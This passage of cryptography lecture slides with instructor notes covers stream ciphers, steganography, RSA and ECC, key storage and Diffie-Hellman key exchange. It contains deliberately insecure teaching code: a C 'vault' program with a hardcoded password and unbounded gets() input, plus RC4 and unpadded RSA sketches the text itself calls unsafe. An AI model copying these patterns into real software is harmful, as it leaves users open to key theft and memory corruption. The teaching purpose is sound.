pad. The attacker could try a brute-force attack, decrypting using every possible key. The result is a list containing one copy of every possible plaintext; the brute-force attack yields absolutely no information about the plaintext. (This is, in general, not true of any imperfect cipher.) We will cover the most popular stream cipher, RC4. Since it is impractical to have Alice send Bob a key that is as long as the plaintext itself, RC4 uses a fixed-size key as a “seed” that generates an infinite stream of key bits. We cover RC4 in just a second, but first we review modular arithmetic, as it is used in the implementation of RC4 (as well as in RSA, which we will see in the next lecture). One-time pad, an excerpt: If the key is truly random, an XOR-based one-time pad is perfectly secure against ciphertext-only cryptanalysis. This means an attacker can't compute the plaintext from the ciphertext without knowledge of the key, even via a brute-force search of the space of all keys! Trying all possible keys doesn't help at all, because all possible plaintexts are equally likely decryptions of the ciphertext. This result is true regardless of how few bits the key has or how much you know about the structure of the plaintext. To see this, suppose you intercept a very small, 8-bit, ciphertext.
You know it is either the ASCII character 'S' or the ASCII character 'A' encrypted with a one-time pad. You also know that if it's 'S', the enemy will attack by sea, and if it's 'A', the enemy will attack by air. That's a lot to know. All you are missing is the key, a silly little 8-bit one-time pad. You assign your crack staff of cryptanalysts to try all 256 possible 8-bit one-time pads. This is a brute-force search of the keyspace. The result of the brute-force search is that your staff finds one 8-bit key that decrypts the ciphertext to 'S' and one that decrypts it to 'A'. And you still don't know which one is the actual plaintext. This argument is easily generalized to keys (and plaintexts) of arbitrary length.

341 12.2.1 One-Time Pad Key as long as plaintext, random stream of bits
Ciphertext = Key XOR Plaintext Only use key once! Impractical having key the same size as plaintext (too long, incurs too much overhead) Theoretical Significance: “perfect secrecy” (Shannon) if key is random. Under brute-force, every decryption equally likely Ciphertext yields no info about plaintext (attacker’s a priori belief state about plaintext is unchanged)
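The scheme itself is one line of arithmetic per byte. A toy Java sketch of our own (the pad must be truly random, as long as the message, and used exactly once):

public class OneTimePad {
    // c = m XOR k; running the same function on c recovers m.
    static byte[] xor(byte[] msg, byte[] pad) {
        if (pad.length < msg.length)
            throw new IllegalArgumentException("pad too short");
        byte[] out = new byte[msg.length];
        for (int i = 0; i < msg.length; i++)
            out[i] = (byte) (msg[i] ^ pad[i]);
        return out;
    }
}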

342 12.2.2. RC4 Most popular stream cipher: 10x faster than DES
Fixed-size key “seed” used to generate an infinite stream. State table S that changes to create the stream. Ex: 256-bit key used to seed (fill) the table. (The intuition for the algorithm is covered in Schneier's book.) RC4 heavily uses modular arithmetic to create a random keystream. RC4 uses an array, S, whose values it continuously changes to generate the key stream. The array is “seeded” with a “key” that fills the array initially. The values i, j, and t are counters used to index the array S. RC4 generates one byte of key bits each time the algorithm below is run; the newly generated key byte is K. Counters i and j are initialized to 0. S is initialized using the key that both Alice and Bob know. On each iteration, i is incremented by one, and j is set to the value of S[i] added to j. Then, the values in positions S[i] and S[j] are swapped, t is set to S[i] + S[j], and the next byte of key bits is S[t]. All additions are done mod 256. The counter i iterates through the entire array and makes sure that each byte of the array gets modified at least once every 256 steps; bytes can be modified more than once because of the swap step. mod = modular arithmetic.
S-box initialized as follows: first, for all i, S[i] = i. Let K[i] be the key array (filled with the key; if the key is smaller than 256 bytes, it is repeated):
j = 0;
for i = 0 to 255 {
  j = (j + S[i] + K[i]) mod 256;
  swap(S[i], S[j]);
}
In the algorithm, i makes sure that every entry in the S-box eventually changes, and j “randomly” chooses a byte to swap with i:
i = (i + 1) mod 256
j = (j + S[i]) mod 256
swap(S[i], S[j])
t = (S[i] + S[j]) mod 256
K = S[t]
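The table-swapping algorithm in the notes fits in a few lines of Java. A study-only sketch of our own (RC4 is broken and deprecated; never use it in production):

public class RC4 {
    private final int[] S = new int[256];
    private int i = 0, j = 0;

    // Key scheduling: seed the state table with the key (repeated as needed)
    RC4(byte[] key) {
        for (int k = 0; k < 256; k++) S[k] = k;
        int jj = 0;
        for (int k = 0; k < 256; k++) {
            jj = (jj + S[k] + (key[k % key.length] & 0xff)) & 0xff;
            int tmp = S[k]; S[k] = S[jj]; S[jj] = tmp;
        }
    }

    // Generation loop from the notes: swap, then output S[(S[i]+S[j]) mod 256]
    byte nextKeystreamByte() {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        int tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        return (byte) S[(S[i] + S[j]) & 0xff];
    }
}

Encryption XORs each plaintext byte with nextKeystreamByte(); decryption is the identical operation.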

343 … and other ciphers… (Slide shows a comparison table of additional ciphers; source omitted.)

344 12.2.2. RC4 Pitfalls Never use the same key more than once!
Clients & servers should use different RC4 keys! C -> S: P XOR k [Eve captures P XOR k] S -> C: Q XOR k [Eve captures Q XOR k] Eve: (P XOR k) XOR (Q XOR k) = P XOR Q!!! If Eve knows either P or Q, can figure out the other Ex: Simple Mail Transfer Protocol (SMTP) First string client sends server is HELO Then Eve could decipher first few bytes of response

345 12.2.2. More RC4 Pitfalls Initial bytes of key stream are “weak”
Ex: the WEP protocol in the 802.11 wireless standard is broken because of this. Mitigation: discard the initial bytes of the stream (the first few hundred). Active eavesdropper: could flip a bit without detection. Can solve by including a MAC to protect the integrity of the ciphertext.

346 12.3. Steganography All ciphers transform plaintext to random bits
Eve can tell Alice is sending sensitive info to Bob. Goal: conceal the existence of the secret message. Use of a “covert channel” to send a message. So far, we have discussed symmetric cryptography. Before continuing our discussion of applied cryptography with asymmetric cryptography, we will briefly touch upon steganography. The symmetric ciphers that we have discussed so far all have one thing in common: they all seek to transform the plaintext into a random string of bits. If Alice sends a random string of bits to Bob, then an eavesdropper Eve may be able to infer that Alice is sending sensitive information to Bob. However, Alice may want to conceal the fact that she is sending sensitive information to Bob. Steganography is the study of techniques that Alice can use to send sensitive information to Bob while hiding the fact that sensitive information is being transmitted. Steganographic techniques typically use a covert channel to send sensitive information from one party to the other. Consider the following message that Alice sends to Bob: “All the tools are carefully kept.” The message seems harmless enough, but within it there is a covert channel being used to send a secret message. (Most steganography relies on security by obscurity.)

347 What is Steganography? Study of techniques to send sensitive info while hiding the fact that sensitive info is being sent. Ex: “All the tools are carefully kept” -> Attack. Other Examples: invisible ink; hidden in images (least significant bit of image pixels; modifications to the image are not noticeable by an observer; the recipient can check for modifications to get the message). If we only pay attention to the first letter of each word in the sentence, we can see that these first letters spell out the word “ATTACK.” The first letter of each word is a covert channel that is being used to send a secret message. It may be hard for an eavesdropper, Eve, who is not aware of the covert channel to discern that Alice is really telling Bob to “attack” when the message seems to be concerned with tools. There are many other examples of steganography. Invisible-ink pens that children use to send messages to each other are another example. A more serious approach, used to transmit hidden messages as part of electronic pictures, works as follows. Each pixel in a digital picture can be represented as a 24-bit color code: an 8-bit red, green, and blue value for that pixel. The first bits (also called the most significant bits) of each of the 8-bit components have the most significant effect on the color of the pixel. However, the least significant bit has only a very slight effect on the color of the pixel. One could change all of the least significant bits without affecting the average person's perception of the entire image, so one could use these bits to transmit a secret message. For example, if you switched the least significant bits of a black background in a digital image from 000 to 101, you would be able to transmit the secret message “101” from the party sending the image to the party receiving it, and any eavesdroppers would not necessarily be aware that a secret message was encoded in the least significant bits of the pixels. (Diagram: a pixel's Red, Green, and Blue components carrying the LSBs 1, 0, 1.)
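A least-significant-bit encoder takes only a few lines with java.awt.image. A sketch of our own (the image must be saved in a lossless format such as PNG, since JPEG recompression would destroy the hidden bits):

import java.awt.image.BufferedImage;

public class LsbStego {
    // Hide one bit in the blue channel's least significant bit at (x, y).
    static void hideBit(BufferedImage img, int x, int y, int bit) {
        int rgb = img.getRGB(x, y);   // packed ARGB; blue is the low byte
        rgb = (rgb & ~1) | (bit & 1); // overwrite the blue LSB
        img.setRGB(x, y, rgb);
    }

    // Recover the hidden bit.
    static int readBit(BufferedImage img, int x, int y) {
        return img.getRGB(x, y) & 1;
    }
}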

348 12.3.2. Steganography vs. Cryptography
Key Advantage: when Alice & Bob don't want Eve to know that they're communicating secrets. Disadvantages compared to encryption: essentially relying on security by obscurity; useless once the covert channel is discovered; high overhead (ratio of plain bits to secret bits is high). Can be used together with encryption, but with even more overhead (additional computation for both). The key advantage of steganographic techniques is that they allow Alice and Bob to exchange secrets without letting third parties know that such secret messages are being exchanged. The key disadvantage is that steganographic techniques rely on obscurity for security: once the covert channel is known to the third party, the technique is useless. In addition, even if the technique is unknown to the third party, there is a high overhead for sending secret messages. In our previous example, only three bits per pixel could be used to send the secret message. (The overhead is about 8 bits for each secret-message bit that needs to be sent.) The more bits that are used as part of the covert channel, the more perceivable the alterations in color might be to the third party; the fewer bits that are used, the higher the overhead. Steganography can be used together with encryption to leverage some of the advantages of both. If a message is encrypted before it is inserted into a covert channel, Alice and Bob may be able to hide that they are communicating secret messages, and even if the third party does figure out that there is a covert channel and obtains the contents of the secret message, the third party may not be able to decrypt it. However, even by combining steganography with encryption, it is hard to eliminate the high overhead. This concludes this chapter; in the next chapter we will cover asymmetric cryptography, a kind of cryptography in which Alice and Bob use two different keys, a public key and a private key, to exchange messages instead of just one key that Alice and Bob share.

349 Summary Cryptography: encode & decode messages
Applied to serve security goals (confidentiality) Symmetric Ciphers: Alice & Bob have same key Block Ciphers: DES, AES (128-bit blocks at a time) Stream Ciphers: OTP, RC4 (byte at a time, faster) Encrypting More Data: ECB & CBC Steganography: Attempt to hide that secrets are being communicated at all

350 CHAPTER 13 Asymmetric Key Cryptography

351 Agenda Problem with Symmetric Key Crypto: Alice & Bob have to agree on a key! In 1976, Diffie & Hellman proposed asymmetric or public key cryptography. RSA & Elliptic Curve Cryptography (ECC). Certificate Authorities (CAs). Identity-Based Encryption (IBE). Authentication via Encryption.

352 13.1. Why Asymmetric Key Cryptography?
So two strangers can talk privately on Internet Ex: Bob wants to talk to Alice & Carol secretly Instead of sharing different pairs of secret keys with each (as in symmetric key crypto) Bob has 2 keys: public key and private (or secret) key Alice and Carol can send secrets to Bob encrypted with his public key Only Bob (with his secret key) can read them

353 13.1. … To Mess With Poor Eve (Slide shows a cartoon; source omitted.)

354 13.1. Public Key System (Diagram: Bob, Alice, Carol, and Denise with a public-key Directory.)

355 13.1. The Public Key Treasure Chest
Public key = Chest with open lock Private key = Key to chest Treasure = Message Encrypting with public key Find chest with open lock Put a message in it Lock the chest Decrypting with private key Unlock lock with key Take contents out of the chest Another way to think of asymmetric encryption is as follows. When Bob gives out his public key, it is like him giving out an open, empty treasure chest. Anyone can put a message in the treasure chest and lock the treasure chest. However, Bob is the only one that can open the treasure chest because his private key is the key to the treasure chest.

356 13.1. Asymmetric Encryption
Alice encrypts a message with a different key than Bob uses to decrypt. Bob has a public key, kp, and a secret key, ks. Bob's public key is known to Alice. Asymmetric Cipher: F^-1(F(m,kp),ks) = m. In this slide, we summarize how asymmetric cryptography works. If Alice wants to send a secret message to Bob, she first constructs her message, M. She then computes a ciphertext, C, using an asymmetric encryption scheme that takes the message to be encrypted and Bob's public key as input. Remember that Bob's public key is public and can be published in a directory, which is how Alice knows it. Alice sends the ciphertext to Bob. When Bob receives the ciphertext, he feeds the ciphertext and his private key to an asymmetric decryption algorithm to recover the message. Alice: 1. Construct m. 2. Compute c = F(m,kp). 3. Send c to Bob. Bob: 4. Receive c from Alice. 5. Compute d = F^-1(c,ks). 6. m = d.

357 13.2. RSA (1) Invented by Rivest/Shamir/Adleman (1978)
First asymmetric encryption algorithm. Most widely known public key cryptosystem. Used in many protocols (e.g., SSL, PGP, …). Number-theoretic algorithm: security based on the difficulty of factoring large numbers (products of two large primes). 1024-, 2048-, and 4096-bit keys are common. After briefly introducing symmetric ciphers in the last lecture, we talked about some examples of them, such as DES and AES. Now that we have talked about how asymmetric ciphers work in general, we will talk about two examples of them, namely RSA and ECC. RSA is the first asymmetric encryption algorithm ever developed. Shortly after Diffie and Hellman published a paper about the idea of an asymmetric cipher, Rivest, Shamir, and Adleman (the R, S, and A in RSA) came up with an implementation of the idea. Even today, RSA is the most widely known and used asymmetric cipher. It is used in protocols such as SSL, CDPD, WTLS, PGP, and many others. SSL, used for secure communication between web browsers and servers, we have already met. CDPD stands for Cellular Digital Packet Data, a wireless data protocol. WTLS stands for Wireless Transport Layer Security, SSL's analog for the wireless web. So you get the point: RSA is widely used in many protocols. The mathematical properties of the RSA algorithm are based on number theory, and we will go through a very high-level overview of how it works in just a second. The security of the algorithm depends on the difficulty of factoring large numbers into their prime factors: if it is difficult to factor large numbers, it will be hard to break the mathematical properties of the algorithm. Common key sizes used with RSA are 1024, 2048, and 4096 bits. Keep in mind that since RSA is a different algorithm, these key sizes do not have a direct relation to the key sizes of symmetric algorithms (or even other asymmetric algorithms). That is, just because we might encrypt a message with a 1024-bit RSA key, that does not mean it is more or less “secure” in any way than encrypting a message using a 256-bit AES key. We can compare the strength of key sizes of different algorithms by measuring the expected amount of time it would take to successfully conduct a brute-force attack on them, but in general it does not make much sense to directly compare the lengths of keys of two different algorithms.

358 13.2. RSA (2)
Public Key Parameters: large composite number n with two prime factors (n = pq); encryption exponent e coprime to φ(n) = (p-1)(q-1)
Private Key: the factors of n, p and q; decryption exponent d such that ed ≡ 1 (mod φ(n))
Encryption: Alice sends c = m^e mod n
Decryption: Bob computes m = c^d mod n
Euler's Theorem: a^φ(n) ≡ 1 (mod n) for a coprime to n
Check: since ed = 1 + kφ(n), m^(ed) ≡ m · (m^φ(n))^k ≡ m (mod n)
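The whole scheme can be exercised with java.math.BigInteger. A toy, unpadded ("textbook") RSA sketch of our own, fine for checking the math but never for real use (real RSA needs padding such as OAEP):

import java.math.BigInteger;
import java.security.SecureRandom;

public class ToyRSA {
    public static void main(String[] args) {
        SecureRandom rnd = new SecureRandom();
        BigInteger p = BigInteger.probablePrime(512, rnd);
        BigInteger q = BigInteger.probablePrime(512, rnd);
        BigInteger n = p.multiply(q);                 // public modulus
        BigInteger phi = p.subtract(BigInteger.ONE)
                          .multiply(q.subtract(BigInteger.ONE));
        BigInteger e = BigInteger.valueOf(65537);     // public exponent
        BigInteger d = e.modInverse(phi);             // ed ≡ 1 (mod φ(n))

        BigInteger m = new BigInteger("42");          // toy "message"
        BigInteger c = m.modPow(e, n);                // c = m^e mod n
        System.out.println(c.modPow(d, n));           // prints 42
    }
}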

359 13.3. Elliptic Curve Cryptography
Invented by N. Koblitz & V. Miller (1985). Based on the hardness of the elliptic curve discrete log problem. Standardized by NIST, ANSI, IEEE for government and financial use. Certicom, Inc. currently holds the patent. Small keys: 163 bits (<< 1024-bit RSA keys). Elliptic curve cryptography provides yet another way to build a public key cryptosystem. It was invented by Neal Koblitz and Victor Miller independently at about the same time, in 1985; its discovery is much more recent than RSA's. Elliptic curve cryptography is also based on number theory: its security is not dependent upon the difficulty of factoring large numbers, but instead on the difficulty of the elliptic curve discrete log problem. Since RSA has been around longer than ECC and mathematicians have had more time to look at attacks on it, we might say that RSA is more well understood than ECC. Nevertheless, ECC has started making an impact in real-world security systems, which is why we mention it here. For example, ECC public-key crypto has been incorporated into WTLS, a wireless version of the SSL protocol. Since the mathematics of ECC are more complicated than those of RSA, we're not going to cover them here, but you can consult Stallings if you are interested. The key thing to know about ECC-based public key crypto from a systems standpoint is that it allows us to do public key operations using much smaller keys than RSA. Studies estimate that a 163-bit ECC key is comparable in strength to a 1024-bit RSA key, in that it might take an attacker about the same amount of time to conduct a brute-force attack on either. Due to the smaller key sizes, ECC has some advantages over RSA for certain types of applications, such as wireless applications, since wireless devices usually have less memory and computing resources than desktop PCs. A public company by the name of Certicom currently holds the patent for ECC-based public key crypto. Unlike RSA, the security of the elliptic curve public-key cryptosystem is based on the difficulty of the discrete log problem, as opposed to the difficulty of factoring.

360 13.3: RSA vs. ECC
RSA Advantages: has been around longer, math well understood; patent expired, royalty free; faster encryption.
ECC Advantages: shorter key size; fast key generation (no primality testing); faster decryption.
What are the key differences between RSA and ECC? As we mentioned earlier, since RSA has been around longer, it is probably more well understood than ECC. RSA also used to be held under a patent by RSA Data Security, but that patent expired on September 20, 2000, so RSA can be used royalty free. However, you will still need to pay royalties to Certicom, Inc. if you want to use ECC. The third advantage is that RSA provides, in general, faster encryption for comparable key strength. (Usually, a small public exponent such as e=3 or e=65537 is used with RSA because it makes verifying digital signatures very fast; we will talk about digital signatures shortly.) Looking at ECC, we see that its advantages are a shorter key size for comparable cryptographic strength and faster key generation. In order to use public key crypto, a user first needs to generate a public/private key pair that satisfies certain mathematical properties. For RSA, we needed to find two large prime numbers that we could multiply together to “set up” the system (remember, in RSA all operations are done mod n, where n is the product of these two large primes), and checking that a number hundreds of digits long is prime is not easy; that is, it takes a while! Since ECC public key systems do not require such large prime numbers, we do not have to do this primality checking; as a result, generating public/private key pairs for new users is much faster with ECC. Finally, ECC allows us to do decryption faster than RSA for comparable key strength. For more info about the trade-offs between RSA and ECC, you may consult two research papers written by yours truly on my web site.

361 13.4. Symmetric vs. Asymmetric Key Cryptography
Symmetric Crypto (DES, 3DES, AES): efficient (smaller keys / faster encryption) because of simpler operations (XORs, substitutions, permutations). Key agreement problem. Online. Asymmetric Crypto (RSA, ECC): RSA is ~1000x slower than DES; more complicated operations (e.g. modular exponentiation), with security resting on hard problems such as factoring and discrete log. How to publish public keys? Requires PKI / CAs. Offline or Online.

362 13.5. Certificate Authorities
Trusted third party: CA verifies people’s identities Authenticates Bob & creates public key certificate (binds Bob’s identity to his public key) CA also revokes keys and certificates Certificate Revocation List: compromised keys Public Key Infrastructure (PKI): CA + everything required for public key encryption

363 13.6. Identity-Based Encryption
Ex: e-mail address as identity & public key. Bob gets his private key from a Private Key Generator (PKG) after authenticating himself via a CA. Commercialized by Voltage Security (2002). Revoked keys: concatenate the current date to the public key; the PKG then stops providing the corresponding private key after the date on which the key was compromised.

364 13.7. Authentication with Encryption
Alice issues a “challenge” message: a random # (nonce) encrypted with Bob's public key. If the person is actually Bob, he will be able to decrypt it. (Diagram: Alice sends { }PK(Bob) to Bob, who can open it; Eve, receiving { }PK(Bob), cannot.) Until this point, we have looked at all keys as being encryption keys. That is, whether we were talking about a symmetric encryption algorithm or an asymmetric encryption algorithm, DES or RSA, we talked about using a key of the appropriate length to do encryption or decryption. The most obvious application of encryption is to achieve confidentiality. However, encryption can be used for other applications as well; for example, we can use encryption to do authentication. This is how we would do it with a public key cryptosystem. If I believe that only Bob has Bob's private key, then if I want to check whether or not I am really communicating with Bob, I can encrypt a “challenge” message using Bob's public key. The challenge message is just a regular message that might say something like “If you can read this, then say ‘BOO’!” If the person on the other end of the communication is able to read the message, it must be because that person has possession of Bob's private key, and the person should respond by sending the message “Boo!” If we believe that Bob is responsible and has not given his private key to anybody else, and that Bob is also smart enough to have his systems protected so that his private key cannot be stolen, then we have the right to believe that we are actually communicating with Bob. Hence, we just used public-key encryption to authenticate Bob: we used the public key encryption scheme to check that we are actually talking to Bob and nobody else.

365 A Word of Caution In the previous example, as well as some other examples presented in later chapters, the simple toy protocols that we discuss are for instructive and illustration purposes only. They are designed to make concepts easy to understand, and are vulnerable to various types of attacks that we do not necessarily describe. Do not implement these protocols as is in software. For example, the simple “challenge” authentication method is vulnerable to a man-in-the-middle attack: Mallory gets a challenge from Alice and forwards it to Bob; she then takes his response and returns it to Alice. Bob needs to authenticate Alice as well.

366 Summary Asymmetric Cryptography: Two Keys Examples: RSA, ECC
Public key published in directory Secret key known only to Bob Solves key exchange problem Examples: RSA, ECC PKI required: CAs, Trusted Third Parties Applications: IBE, Authentication, SSL…

367 CHAPTER 14 Key Management & Exchange

368 Agenda Key Management: process of generating, storing, agreeing upon and revoking keys Generation: How should new keys be created? Storage: How to securely store keys so they can’t be stolen? Agreement: How do 2 parties agree on a key to protect secrets?

369 14.1. Types of Keys Encryption keys can be used to accomplish different security goals: Identity Keys; Conversation or Session Keys; Integrity Keys. One Key, One Purpose: don't reuse keys! Because encryption can be used for purposes other than confidentiality, security systems use encryption in many places. We have seen encryption used to achieve confidentiality and authentication. However, encryption can also be used as a primitive to achieve other security goals. In some systems, different algorithms are used for different purposes, but all of these algorithms require us to use keys. As a result, it is often useful to make a distinction between different types of keys that are used for different purposes. Since asymmetric encryption is very costly (RSA encryption takes 1000 times as long as DES encryption), it is typically only used for authentication. Symmetric encryption, due to its relative efficiency, can be used for authentication as well as confidentiality purposes. Authentication typically happens once per connection set up between two parties, and some keys might be used in order to accomplish the authentication. Keys that are used to accomplish authentication are typically referred to as “identity” keys. Identity keys (such as a user's private key) are generated by the principal whom the key authenticates. Since they are used to authenticate a principal, and the lifetime of a principal might be long (i.e., up to 100 years), we use key lengths that would generally not be breakable within that timeframe. On the other hand, we might use a key to encrypt the contents of a conversation with another party; this type of key is often referred to as a “conversation key” or a “session key.” Since we may only care about protecting the contents of a particular conversation for, say, 1 year or 5 years, we can use a key length for a conversation key that is shorter than for an identity key. In addition, either party may generate the conversation key (assuming that both parties are, to an extent, “trusted”), or the conversation key may be generated partly by each party.

370 14.1.1. Identity Keys Used to help carry out authentication
Authentication once per connection between two parties Generated by principal, long-lifetime (more bits) Bound to identity with certificate (e.g. public keys in asymmetric system)

371 14.1.2. Conversation or Session Keys
Helps achieve confidentiality Used after 2 parties have authenticated themselves to each other Generated by key exchange protocol (e.g. Diffie-Hellman algorithm) Short-lifetime (fewer bits)

372 Integrity Keys Key used to compute Message Authentication Codes (MACs) Alice and Bob share integrity key Can use to compute MACs on message Detect if Eve tampered with message Integrity keys used in digital signatures

373 14.2. Key Generation Key generated through algorithms (e.g. RSA)
Usually involves random # generation as a step But for IBE, also need PKG, master key Avoid weak keys (e.g. in DES keys of all 1s or 0s, encrypting twice decrypts) Don’t want keys stolen: After generation Don’t store on disk connected to network Also eliminate from memory (avoid core dump attack) Generating keys from passwords: Use password-based encryption systems (e.g. PKCS #5) to guard against dictionary attacks
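For the password-derived case, the Java platform ships PBKDF2 (the PKCS #5 v2 algorithm alluded to on the slide). A minimal sketch of our own; the salt size and iteration count shown are illustrative choices:

import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.security.SecureRandom;

public class PasswordKey {
    // Derive a 128-bit key from a password. The random per-user salt and
    // the high iteration count make precomputed dictionary attacks costly.
    static byte[] derive(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 100000, 128);
        SecretKeyFactory f =
            SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return f.generateSecret(spec).getEncoded();
    }

    static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;   // store alongside whatever the derived key protects
    }
}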

374 14.2.1. Random Number Generation
Ex: Alice & Bob use RSA to exchange a secret key for symmetric crypto (faster) Alice generates random # k Sends to Bob, encrypted with his public key Then use k as key for symmetric cipher But if attacker can guess k, no secrecy Active eavesdropper can even modify/inject data into their conversation Problem: Generating hard to guess random #s

375 14.2.2. The rand() function How about using rand() function in C?
Uses linear congruential generator After some time, output repeats predictably Can infer seed based on few outputs of rand() Allows attacker to figure out all past & future output values No longer unpredictable Don’t use for security applications

376 Random Device Files Virtual devices that look like files (e.g. on Linux). Reading from the file provides unpredictable random bits, generated based on events observed since booting. /dev/random – blocks until random bits are available. /dev/urandom – doesn't block, returns what's there.
$ head -c 20 /dev/random > /tmp/bits    # read 20 bytes
$ uuencode --base64 /tmp/bits printbits # encode, print
begin-base64 printbits
bj4Ig9V6AAaqH7jzvt9T60aogEo=
====                                    # random output

377 Random APIs Windows OS: CryptGenKey() – to securely generate keys Java: SecureRandom class in java.security package (c.f. AESEncrypter example, Ch. 12) Underlying calls to OS (e.g. CryptGenKey() for Windows or reads from /dev/random for Linux) No guarantees b/c cross-platform But better than java.util.Random
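In Java the call pattern is short. A sketch of our own showing key material generated the right way:

import java.security.SecureRandom;

public class RandomBytes {
    public static void main(String[] args) {
        SecureRandom sr = new SecureRandom();  // OS-seeded CSPRNG
        byte[] keyBytes = new byte[16];
        sr.nextBytes(keyBytes);                // fit for keys, IVs, nonces
        // java.util.Random, by contrast, is a predictable generator
        // and must never be used for security purposes.
    }
}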

378 14.3. Key (Secret) Storage Secret to store for later use
A cryptographic (private) key, a password, or any info the system's security depends on. Recall Kerckhoffs' principle: security should depend not on the secrecy of the algorithm, but on the secrecy of cryptographic keys. Options for storing secrets?

379 Keys in Source Code Ex: a program storing a file on disk such that no other program can touch it. Might use a key to encrypt the file: where to store the key? Maybe just embed it in the source code? Easy, since you can use it at runtime to decrypt. But an attacker can reverse-engineer the binary to obtain the key (even if obfuscated); e.g. the strings utility outputs the sequences of printable chars in object code.

380 14.3.1. Reverse-Engineering Key Leaked!
/* vault program (from 6.1.2) */
int checkPassword() {
    char pass[16];
    bzero(pass, 16);              // Initialize
    printf("Enter password: ");
    gets(pass);
    if (strcmp(pass, "opensesame") == 0)
        return 1;
    else
        return 0;
}

void openVault() {
    // Opens the vault
}

main() {
    if (checkPassword()) {
        openVault();
        printf("Vault opened!");
    }
}

# partial output of printable characters in object code
$ strings vault
Enter password:
opensesame
__main
_impure_ptr
calloc
cygwin_internal
dll_crt0__FP11per_process
free
gets
malloc
printf
realloc
strcmp
GetModuleHandleA
cygwin1.dll
KERNEL32.dll

Key Leaked!

381 14.3.2. Storing the Key in a File on Disk
Alternative to storing in source code, could store in file on disk Attacker with read access could Find files with high entropy (randomness) These would be candidate files to contain keys C.f. “Playing Hide and Seek with Stored Keys” (Shamir and van Someren)

382 “Hard to Reach” Places Store in Windows Registry instead of file? Part of OS that maintains config info Not as easy for average user to open But regedit can allow attacker (or slightly above-average user) to read the registry Also registry entries stored on disk Attacker with full read access can read them Registry not the best place to store secrets

383 14.3.4. Storing Secrets in External Devices (1)
Store secrets in device external to computer! Key won’t be compromised even if computer is Few options: smart card, HSMs, PDAs, key disks Smart Card (contains tamper-resistant chip) Limited CPU power, vulnerable to power attacks Must rely on using untrusted PIN readers Attacker observes power of circuits, computation times to extract bits of the key

384 14.3.4. Storing Secrets in External Devices (2)
Hardware Security Module (HSM) Device dedicated to storing crypto secrets External device, add-on card, or separate machine Higher CPU power, key never leaves HSM (generated and used there) PDA or Cell phone No intermediate devices like PIN readers More memory, faster computations Can have security bugs of their own

385 14.3.4. Storing Secrets in External Devices (3)
Key Disk USB, non-volatile memory, 2nd factor No CPU, not tamper-resistant No support for authentication Ex: IronKey, secure encrypted flash drive External Devices & Keys Allows key to be removed from host system Problem: connected to compromised host Advantage: if crypto operation done on device & key never leaves it, damage limited Can attack only while connected, can’t steal key

386 14.4. Key Agreement and Exchange
Keys have been generated and safely stored, now what? If Alice & Bob both have it, can do symmetric crypto Otherwise, have to agree on key How to create secure communication channel for exchange? Few Options Use Asymmetric Keys Diffie-Hellman (DH) Key Exchange

387 Using Asymmetric Keys Public-key crypto much more computationally expensive than symmetric key crypto Use RSA to send cryptographically random conversation key k Use k as key for faster symmetric ciphers (e.g. AES) for rest of conversation
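Putting the two together is often called hybrid encryption. A toy Java sketch of our own (there is no authentication of Bob's key here, so it is still spoofable, as the following slides warn):

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import java.security.KeyPair;
import java.security.KeyPairGenerator;

public class HybridExchange {
    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair bob = kpg.generateKeyPair();   // Bob's long-term key pair

        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey k = kg.generateKey();        // Alice's fresh session key

        // Alice wraps k under Bob's public key and sends the result;
        // everything afterward uses k with a fast symmetric cipher.
        Cipher rsa = Cipher.getInstance("RSA/ECB/OAEPWithSHA-256AndMGF1Padding");
        rsa.init(Cipher.ENCRYPT_MODE, bob.getPublic());
        byte[] wrappedKey = rsa.doFinal(k.getEncoded());
        System.out.println(wrappedKey.length + "-byte wrapped key");
    }
}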

388 A Word of Caution In the following example, as well as some other examples presented in later chapters, the simple toy protocols that we discuss are for instructive and illustration purposes only. They are designed to make concepts easy to understand, and are vulnerable to various types of attacks that we do not necessarily describe. Do not implement these protocols as is in software.

389 Key Exchange Example
Bob → Alice: I am Bob. My public key is XYZ.
Alice → Bob: {CK=8a6cd93b2b4f8803}RSA(XYZ)  (session key sent under Bob's public key; asymmetric, e.g. RSA)
Bob → Alice: {Hello Alice}AES(8a6cd93b2b4f8803)  (conversation continues under the session key; symmetric, e.g. AES)
In general: announce PK(B), send {k}PK(B), then exchange {data}k.
We might be able to prevent a man-in-the-middle attack by using public-key crypto to do the key exchange. In the protocol above, the first two messages are still susceptible to spoofing.

390 14.4.2. Diffie-Hellman (DH) (1)
Key exchange (over an insecure channel) without public-key certificates? DH: use public parameters g, p. Large prime number p. Generator g of Z*_p = {1, …, p-1}, i.e. the powers g, g^2, …, g^(p-1) produce all these elements. Alice & Bob generate random numbers a, b respectively. Using g, p, a, b, they can create a secret known only to them (relies on the hardness of the discrete log problem).

391 14.4.2. Diffie-Hellman (DH) (2)
Alice chooses a; Bob chooses b.
Alice → Bob: g^a mod p
Bob → Alice: g^b mod p
Alice computes (g^b)^a mod p; Bob computes (g^a)^b mod p.
Secret Key = g^(ab) mod p
